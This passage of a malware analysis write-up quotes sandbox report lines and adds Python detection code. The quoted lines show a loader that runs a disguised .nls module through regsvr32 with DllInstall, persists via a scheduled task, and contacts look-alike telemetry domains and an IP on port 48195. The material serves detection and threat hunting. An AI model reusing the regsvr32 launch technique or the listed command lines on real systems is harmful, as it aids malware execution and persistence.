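    sleeps = defaultdict(list)     # proc -> [(tid, requested, threshold)]
    chains = defaultdict(list)     # proc -> [chain text]
    techniques = defaultdict(set)  # proc -> {technique label}
    for line in lines.splitlines():
        if m := SLEEP_RE.match(line):
            sleeps[m["proc"]].append((int(m["tid"]), int(m["val"]), int(m["thr"])))
        elif m := CHAIN_RE.match(line):
            chains[m["proc"]].append(m["chain"].strip())
        elif m := FUNC_RE.match(line):
            for needle, label in TECHNIQUES.items():
                if needle in m["body"]:
                    techniques[m["proc"]].add(label)
    return sleeps, chains, techniques


def sleep_budget(sleeps):
    """Total sleep requested per process and how many calls reached the report's threshold."""
    out = {}
    for proc, calls in sleeps.items():
        out[proc] = {
            "total": sum(v for _, v, _ in calls),
            "calls": len(calls),
            "over_threshold": sum(1 for _, v, t in calls if v >= t),
        }
    return out


def verdict(sleeps, chains, techniques):
    """Reasons an analyst would flag the run as evasive; an empty list means nothing was seen."""
    reasons = []
    for proc, b in sleep_budget(sleeps).items():
        if b["over_threshold"]:
            reasons.append(f"{proc}: {b['over_threshold']} sleep(s) at/over threshold, total {b['total']}")
    for proc, cs in chains.items():
        for c in cs:
            if "GetPEB" in c and ("ExitProcess" in c or "Sleep" in c):
                # A branch on PEB contents that ends in exit or sleep is the classic sandbox bail-out.
                reasons.append(f"{proc}: decision on PEB contents leads to {c.split(',')[-1].strip()}")
    for proc, ts in techniques.items():
        reasons.append(f"{proc}: {', '.join(sorted(ts))}")
    return reasons


if __name__ == "__main__":
    s, c, t = parse_report(REPORT_LINES)
    for reason in verdict(s, c, t):
        print("-", reason)
```

Because both decision chains end in ExitProcess or Sleep, a sandbox the loader does not like simply sees it exit cleanly or sleep out the analysis window, which is what the "Sample execution stops while process was sleeping" signature records. When reproducing the run, extend the analysis time or patch the Sleep/NtDelayExecution path rather than trusting a short run that shows no second stage.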

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\SysWOW64\regsvr32.exe Domain query: collectiontelemetrysystem.com
Source: C:\Windows\SysWOW64\regsvr32.exe Network Connect: 213.226.114.15 48195 Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Domain query: telemetrysystemcollection.com
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe -n -i:"Install" C:\Users\user\AppData\Local\AdobeFontPack\main.dll Jump to behavior
Source: C:\Windows\System32\taskeng.exe Process created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe -n -i:"Update?heck" "C:\Users\user\AppData\Local\x86\5507.nls" Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe -n -i:"Update?heck" "C:\Users\user\AppData\Local\x86\5507.nls" Jump to behavior
Source: C:\Windows\System32\msiexec.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\msiexec.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\msiexec.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_6E45AACC cpuid 12_2_6E45AACC
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 12_2_6E45AE18 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 12_2_6E45AE18
Source: C:\Windows\System32\msiexec.exe Registry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4 Blob Jump to behavior
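The process chain in this section is the part of the report worth turning into detection logic: taskeng.exe launches the 64-bit regsvr32.exe, which re-executes its SysWOW64 copy with `-n -i:"..."` against a file in AppData that carries a `.nls` extension instead of `.dll`. `-n` skips DllRegisterServer and `-i:` calls the module's DllInstall export with the quoted string, so the loader never needs a registration routine and the file name never has to look like a DLL. The following Python is an added example, not code from the report or the sample: it scores process-creation records against those traits, pulls the trust-store thumbprint out of the registry write shown above, and extracts the domains and ip:port pairs as IOCs. The `USER_WRITABLE` prefixes and the inclusion of svchost.exe as a task host (the scheduler on Windows 10 and later) are assumptions to tune per estate; the `Update?heck` argument is copied exactly as the report prints it.

```python
import re
from dataclasses import dataclass
from pathlib import PureWindowsPath


@dataclass(frozen=True)
class ProcessEvent:
    parent: str   # parent image path
    image: str    # created image path
    cmdline: str  # command line as logged


# Constructed sample: the process creations from the report above plus one benign control event.
PROCESS_EVENTS = [
    ProcessEvent(r"C:\Windows\System32\msiexec.exe", r"C:\Windows\System32\wscript.exe",
                 r"wscript.exe C:\Users\user\AppData\Local\AdobeFontPack\notify.vbs"),
    ProcessEvent(r"C:\Windows\System32\regsvr32.exe", r"C:\Windows\SysWOW64\regsvr32.exe",
                 r'-n -i:"Install" C:\Users\user\AppData\Local\AdobeFontPack\main.dll'),
    ProcessEvent(r"C:\Windows\System32\taskeng.exe", r"C:\Windows\System32\regsvr32.exe",
                 r'C:\Windows\system32\regsvr32.exe -n -i:"Update?heck" "C:\Users\user\AppData\Local\x86\5507.nls"'),
    ProcessEvent(r"C:\Windows\System32\regsvr32.exe", r"C:\Windows\SysWOW64\regsvr32.exe",
                 r'-n -i:"Update?heck" "C:\Users\user\AppData\Local\x86\5507.nls"'),
    ProcessEvent(r"C:\Windows\System32\msiexec.exe", r"C:\Windows\System32\regsvr32.exe",
                 r'/s "C:\Program Files\Vendor\vendor.dll"'),  # control: ordinary COM registration
]

# Heuristic path prefixes and scheduler hosts; tune per environment (assumption).
USER_WRITABLE = ("\\appdata\\", "\\users\\public\\", "\\programdata\\", "\\temp\\")
TASK_HOSTS = {"taskeng.exe", "svchost.exe"}


def _last_path_arg(cmdline):
    """Last path-like token on the command line, with surrounding quotes stripped."""
    tokens = [a or b for a, b in re.findall(r'"([^"]+)"|(\S+)', cmdline)]
    paths = [t for t in tokens if "\\" in t]
    return paths[-1] if paths else ""


def assess_regsvr32(ev):
    """Reasons a regsvr32 launch looks like LOLBin abuse; an empty list means nothing stood out."""
    if PureWindowsPath(ev.image).name.lower() != "regsvr32.exe":
        return []
    reasons = []
    cmd = ev.cmdline.lower()
    target = _last_path_arg(ev.cmdline)
    if "-i:" in cmd or "/i:" in cmd:
        reasons.append("DllInstall entry point invoked with an argument string (-i:)")
    if target and PureWindowsPath(target).suffix.lower() != ".dll":
        reasons.append(f"module has a non-DLL extension: {PureWindowsPath(target).suffix or '(none)'}")
    if any(seg in target.lower() for seg in USER_WRITABLE):
        reasons.append("module lives in a user-writable directory")
    parent = PureWindowsPath(ev.parent).name.lower()
    if parent in TASK_HOSTS:
        reasons.append("launched by the scheduled-task host (persistence)")
    if parent == "regsvr32.exe":
        reasons.append("regsvr32 re-executed itself (System32 -> SysWOW64)")
    return reasons


# Registry path shape of the machine trust stores; the thumbprint is the SHA-1 key name.
CERT_STORE_RE = re.compile(
    r"SystemCertificates\\(?P<store>AuthRoot|Root|CA|TrustedPublisher)\\Certificates\\(?P<thumb>[0-9A-Fa-f]{40})")


def cert_store_write(key_path):
    """(store, thumbprint) when a registry write lands in a machine trust store, else None."""
    m = CERT_STORE_RE.search(key_path)
    return (m["store"], m["thumb"].upper()) if m else None


# Constructed sample: the network lines from the report section above.
NETWORK_LINES = r"""
Source: C:\Windows\SysWOW64\regsvr32.exe Domain query: collectiontelemetrysystem.com
Source: C:\Windows\SysWOW64\regsvr32.exe Network Connect: 213.226.114.15 48195 Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Domain query: telemetrysystemcollection.com
"""


def extract_iocs(lines):
    """Domains and (ip, port) pairs the sandbox saw, ready for a blocklist or a hunt query."""
    domains = sorted(set(re.findall(r"Domain query: (\S+)", lines)))
    conns = sorted({(ip, int(port)) for ip, port in
                    re.findall(r"Network Connect: (\d{1,3}(?:\.\d{1,3}){3}) (\d+)", lines)})
    return {"domains": domains, "connections": conns}


if __name__ == "__main__":
    for ev in PROCESS_EVENTS:
        hits = assess_regsvr32(ev)
        print("SUSPECT" if hits else "ok     ", ev.cmdline)
        for h in hits:
            print("    -", h)
    print(cert_store_write(r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot"
                           r"\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4 Blob"))
    print(extract_iocs(NETWORK_LINES))
```

Two caveats when using this on the report. First, the AuthRoot write by msiexec.exe is not on its own a planted root: AuthRoot is the cache that CryptoAPI's automatic root update fills when chain building fetches a root from Microsoft, and verifying the MSI's Authenticode signature is enough to trigger that, so look the thumbprint up against Microsoft's published root list before calling it trust tampering; an unknown thumbprint written to Root or TrustedPublisher by a non-system process is the stronger signal. Second, the non-standard port 48195 and the two look-alike domains are the pivot points; block or alert on the ip:port pair rather than on "HTTP" since the report shows plain HTTP on that port, not 80 or 443.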